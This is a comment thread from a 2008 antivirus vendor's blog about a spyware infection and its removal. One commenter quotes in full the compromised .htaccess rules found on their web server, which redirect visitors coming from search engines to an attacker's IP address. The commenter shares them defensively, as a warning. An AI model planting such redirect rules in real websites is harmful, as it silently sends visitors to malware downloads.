Comments on: ATTENTION! If your computer is struck by the spyware, you could suffer http://blog.threatfire.com/2008/11/attention-if-your-computer-is-struck-by-the-spyware-you-could-suffer.html ThreatFireâ„¢ AntiVirus protects when others can't Fri, 06 Nov 2009 17:43:38 -0600 http://wordpress.org/?v=2.8.4 hourly 1 By: Brad Peterson http://blog.threatfire.com/2008/11/attention-if-your-computer-is-struck-by-the-spyware-you-could-suffer.html/comment-page-1#comment-101 Brad Peterson Sun, 28 Dec 2008 07:27:00 +0000 http://newblog.threatfire.com/2008/11/attention-if-your-computer-is-struck-by-the-spyware-you-could-suffer/#comment-101 In my case, it was the Vundo malware.<br/><br/>I first tried finding and removing it with AVG anti-virus, Spybot, Lavasoft Ad-aware, Microsoft Defender, Vundo removal tool, and Hijackthis. They did very little finding it or giving me clues on how to remove it.<br/><br/>I then tried Malwarebytes' Anti-Malware, and that found a lot more, but not enough.<br/><br/>The fix came from SuperAntiSpyware. That was far and away the best tool to find this bugger and remove it for good. In my case, it was the Vundo malware.

I first tried finding and removing it with AVG anti-virus, Spybot, Lavasoft Ad-aware, Microsoft Defender, Vundo removal tool, and Hijackthis. They did very little finding it or giving me clues on how to remove it.

I then tried Malwarebytes’ Anti-Malware, and that found a lot more, but not enough.

The fix came from SuperAntiSpyware. That was far and away the best tool to find this bugger and remove it for good.

]]> By: ThreatFire Blogger http://blog.threatfire.com/2008/11/attention-if-your-computer-is-struck-by-the-spyware-you-could-suffer.html/comment-page-1#comment-74 ThreatFire Blogger Tue, 02 Dec 2008 17:22:00 +0000 http://newblog.threatfire.com/2008/11/attention-if-your-computer-is-struck-by-the-spyware-you-could-suffer/#comment-74 redmapleleaf-<br/><br/>Sorry to hear that your server was compromised, and thanks for posting that valuable information about htaccess.<br/>At the same time, the problem that is described in the post is a client issue. Your redirected site visitors unfortunately were coerced into downloading and running a file similar in name to "A9installer_880147.exe", and then saw the problems described in the post on their system.<br/><br/>Thanks again, and nice work cleaning up the issue on your site. redmapleleaf-

Sorry to hear that your server was compromised, and thanks for posting that valuable information about htaccess.
At the same time, the problem that is described in the post is a client issue. Your redirected site visitors unfortunately were coerced into downloading and running a file similar in name to “A9installer_880147.exe”, and then saw the problems described in the post on their system.

Thanks again, and nice work cleaning up the issue on your site.

]]> By: redmapleleaf http://blog.threatfire.com/2008/11/attention-if-your-computer-is-struck-by-the-spyware-you-could-suffer.html/comment-page-1#comment-71 redmapleleaf Wed, 26 Nov 2008 15:22:00 +0000 http://newblog.threatfire.com/2008/11/attention-if-your-computer-is-struck-by-the-spyware-you-could-suffer/#comment-71 This problem is a server side, not a client side. That is your computer is probably OK. My webserver has been infected with this problem and all my clients are suffering from it every time they connected to my website. <br/><br/>Upon contacting my host, they were able to determine the problem which was in the .htaccess file. Some how this file was compromised on their server and start redirecting traffic to the site in Modova/Eastern Europe that you are seeing. Here is the content of the .htaccess file that responsible for this problem:<br/><br/>RewriteEngine On<br/>RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]<br/>RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]<br/>RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]<br/>RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]<br/>RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]<br/>RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]<br/>RewriteRule .* http://89.28.13.203/in.html?s=jh [R,L]<br/><br/>I hope this could help somebody from too much suffering. This problem is a server side, not a client side. That is your computer is probably OK. My webserver has been infected with this problem and all my clients are suffering from it every time they connected to my website.

Upon contacting my host, they were able to determine the problem which was in the .htaccess file. Some how this file was compromised on their server and start redirecting traffic to the site in Modova/Eastern Europe that you are seeing. Here is the content of the .htaccess file that responsible for this problem:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.203/in.html?s=jh [R,L]

I hope this could help somebody from too much suffering.

]]> By: Kurt http://blog.threatfire.com/2008/11/attention-if-your-computer-is-struck-by-the-spyware-you-could-suffer.html/comment-page-1#comment-66 Kurt Tue, 18 Nov 2008 06:54:00 +0000 http://newblog.threatfire.com/2008/11/attention-if-your-computer-is-struck-by-the-spyware-you-could-suffer/#comment-66 Hah, right! Hah, right!

]]> By: Disk4mat http://blog.threatfire.com/2008/11/attention-if-your-computer-is-struck-by-the-spyware-you-could-suffer.html/comment-page-1#comment-65 Disk4mat Tue, 18 Nov 2008 05:27:00 +0000 http://newblog.threatfire.com/2008/11/attention-if-your-computer-is-struck-by-the-spyware-you-could-suffer/#comment-65 LOL<br/><br/>"The spyware" to imply there is only one out there. If only, if only right? LOL

“The spyware” to imply there is only one out there. If only, if only right?

]]>